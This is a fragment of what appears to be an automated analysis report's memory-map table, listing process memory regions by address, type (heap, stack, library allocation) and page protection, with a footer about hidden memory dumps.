|
trusted library allocation
|
page read and write
|
||
2BCA7652000
|
trusted library allocation
|
page read and write
|
||
2BCBF449000
|
heap
|
page read and write
|
||
2BCB6C21000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6C0000
|
trusted library allocation
|
page read and write
|
||
ABC000
|
heap
|
page read and write
|
||
2BCA7C7C000
|
trusted library allocation
|
page read and write
|
||
2BCA8A25000
|
trusted library allocation
|
page read and write
|
||
2BCB6F08000
|
trusted library allocation
|
page read and write
|
||
16773970000
|
heap
|
page read and write
|
||
B60000
|
heap
|
page read and write
|
||
F6D708A000
|
stack
|
page read and write
|
||
7FFD9B796000
|
trusted library allocation
|
page read and write
|
||
7FFD9BADC000
|
trusted library allocation
|
page read and write
|
||
11820632000
|
heap
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
268F8720000
|
heap
|
page read and write
|
||
268E1897000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6FB000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7B6000
|
trusted library allocation
|
page execute and read and write
|
||
1B8A0000
|
heap
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
38B504C000
|
stack
|
page read and write
|
||
10B2000
|
heap
|
page read and write
|
||
7FFD9B6D2000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB2D000
|
trusted library allocation
|
page read and write
|
||
167751B0000
|
trusted library allocation
|
page read and write
|
||
2BCA4FF0000
|
heap
|
page read and write
|
||
7FFD9BB3D000
|
trusted library allocation
|
page read and write
|
||
11820524000
|
heap
|
page read and write
|
||
11820608000
|
heap
|
page read and write
|
||
7FFD9B898000
|
trusted library allocation
|
page read and write
|
||
16775B00000
|
heap
|
page read and write
|
||
7DF4E7EC0000
|
trusted library allocation
|
page execute and read and write
|
||
2BCA6B00000
|
heap
|
page execute and read and write
|
||
167102F7000
|
trusted library allocation
|
page read and write
|
||
38B51CC000
|
stack
|
page read and write
|
||
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
2BCA505F000
|
heap
|
page read and write
|
||
167018F3000
|
trusted library allocation
|
page read and write
|
||
1677594E000
|
heap
|
page read and write
|
||
16775C05000
|
heap
|
page read and write
|
||
29FF000
|
trusted library allocation
|
page read and write
|
||
16775390000
|
heap
|
page read and write
|
||
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
16700229000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA32000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6E0000
|
trusted library allocation
|
page read and write
|
||
16701122000
|
trusted library allocation
|
page read and write
|
There are 998 hidden memdumps, click here to show them.